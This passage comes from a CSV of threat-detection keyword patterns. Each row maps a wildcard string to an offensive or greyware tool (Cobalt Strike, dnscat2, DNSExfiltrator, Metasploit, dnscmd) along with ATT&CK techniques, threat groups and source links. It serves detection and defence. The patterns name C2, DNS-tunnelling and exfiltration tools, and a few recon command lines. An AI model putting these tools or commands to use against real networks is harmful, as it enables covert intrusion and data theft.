APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*dns_beacon_get_TXT*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*dns_beacon_maxdns*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*dns_beacon_ns_response*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*dns_beacon_put_metadata*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*dns_beacon_put_output*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*dns_bruteforce.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*dns_redir.sh *","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","0","N/A","10","10","283","53","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" +"*dns_spoof.*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*dns_stager_prepend*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","821","139","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" +"*dns_stager_prepend*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*'dns_stager_prepend'*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*dns_stager_subhost*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","821","139","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" +"*dns_stager_subhost*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*'dns_stager_subhost'*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*dnsadmin_serverlevelplugindll.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*DNSAES256Handler.*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" +"*dns-beacon *","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*DNS-C2 #>*","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","0","N/A","10","10","211","75","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z" +"*dnscan-master*","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","1","N/A","6","10","985","413","2022-08-09T11:11:31Z","2013-03-13T10:42:07Z" +"*dnscat -*","offensive_tool_keyword","dnscat2","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/iagox86/dnscat2","1","0","N/A","10","10","3077","596","2023-04-26T17:40:22Z","2013-01-04T23:15:55Z" +"*dnscat tcpcat*","offensive_tool_keyword","dnscat2","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/iagox86/dnscat2","1","0","N/A","10","10","3077","596","2023-04-26T17:40:22Z","2013-01-04T23:15:55Z" +"*dnscat*","offensive_tool_keyword","dnscat","Welcome to dnscat2. a DNS tunnel that WON'T make you sick and kill you This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol. which is an effective tunnel out of almost every network.","T1071 - T1090 - T1571","TA0011","N/A","N/A","Data Exfiltration","https://github.com/iagox86/dnscat2","1","0","N/A","N/A","10","3077","596","2023-04-26T17:40:22Z","2013-01-04T23:15:55Z" +"*dnscat2*.tar.bz2*","offensive_tool_keyword","dnscat2","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/iagox86/dnscat2","1","1","N/A","10","10","3077","596","2023-04-26T17:40:22Z","2013-01-04T23:15:55Z" +"*dnscat2-*.zip*","offensive_tool_keyword","dnscat2","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/iagox86/dnscat2","1","1","N/A","10","10","3077","596","2023-04-26T17:40:22Z","2013-01-04T23:15:55Z" +"*dnscat2.*","offensive_tool_keyword","dnscat2","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/iagox86/dnscat2","1","1","N/A","10","10","3077","596","2023-04-26T17:40:22Z","2013-01-04T23:15:55Z" +"*dnscat2.ps1*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" +"*dnscat2/*","offensive_tool_keyword","dnscat2","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/iagox86/dnscat2","1","1","N/A","10","10","3077","596","2023-04-26T17:40:22Z","2013-01-04T23:15:55Z" +"*dnscat2-server*","offensive_tool_keyword","dnscat2","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/iagox86/dnscat2","1","1","N/A","10","10","3077","596","2023-04-26T17:40:22Z","2013-01-04T23:15:55Z" +"*dnscat2-win32.exe*","offensive_tool_keyword","dnscat2","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/iagox86/dnscat2","1","1","N/A","10","10","3077","596","2023-04-26T17:40:22Z","2013-01-04T23:15:55Z" +"*dnschef --fakeip 127.0.0.1 -q*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*dnscmd . /enumrecords /zone *","greyware_tool_keyword","dnscmd","the actor gather information about the target environment","T1018 - T1049","TA0007 - TA0009","N/A","Volt Typhoon","Reconnaissance","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" +"*dnscmd . /enumzones*","greyware_tool_keyword","dnscmd","the actor gather information about the target environment","T1018 - T1049","TA0007 - TA0009","N/A","Volt Typhoon","Reconnaissance","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" +"*dnsenum*","offensive_tool_keyword","dnsenum","multithreaded perl script to enumerate DNS information of a domain and to discover non-contiguous ip blocks.","T1218 - T1018 - T1190 - T1590 - T1012","TA0002 - TA0007","N/A","N/A","Information Gathering","https://github.com/fwaeytens/dnsenum","1","1","N/A","N/A","6","521","133","2019-10-08T19:58:40Z","2014-01-10T14:47:09Z" +"*DNS-Enum-*-*.log*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*dnsexfiltrator.*","offensive_tool_keyword","DNSExfiltrator","DNSExfiltrator allows for transfering (exfiltrate) a file over a DNS request covert channel. This is basically a data leak testing tool allowing to exfiltrate data over a covert channel.","T1041 - T1048","TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/Arno0x/DNSExfiltrator","1","1","N/A","10","8","792","189","2019-10-06T22:24:55Z","2017-12-20T13:58:09Z" +"*DNSExfiltratorLib*","offensive_tool_keyword","DNSExfiltrator","DNSExfiltrator allows for transfering (exfiltrate) a file over a DNS request covert channel. This is basically a data leak testing tool allowing to exfiltrate data over a covert channel.","T1041 - T1048","TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/Arno0x/DNSExfiltrator","1","1","N/A","10","8","792","189","2019-10-06T22:24:55Z","2017-12-20T13:58:09Z" +"*DNSListener.py*","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","1","N/A","10","10","211","75","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z" +"*dnslytics-get-rootdomains*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" +"*dnsmastermind.rb*","offensive_tool_keyword","dnscat2","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/iagox86/dnscat2","1","1","N/A","10","10","3077","596","2023-04-26T17:40:22Z","2013-01-04T23:15:55Z" +"*dnsmorph*","offensive_tool_keyword","dnsmorph","DNSMORPH is a domain name permutation engine. inspired by dnstwist. It is written in Go making for a compact and very fast tool. It robustly handles any domain or subdomain supplied and provides a number of configuration options to tune permutation runs.","T1568.002 - T1568.003 - T1568.001 - T1568.004","TA0009 - TA0011","N/A","N/A","Phishing","https://github.com/netevert/dnsmorph","1","1","N/A","N/A","3","241","41","2023-08-08T06:38:59Z","2018-02-20T19:13:35Z" +"*dnspayload.bin*","offensive_tool_keyword","cobaltstrike","Cobaltstrike payload generator","T1548.002 - T1548.003 - T1134.001 - 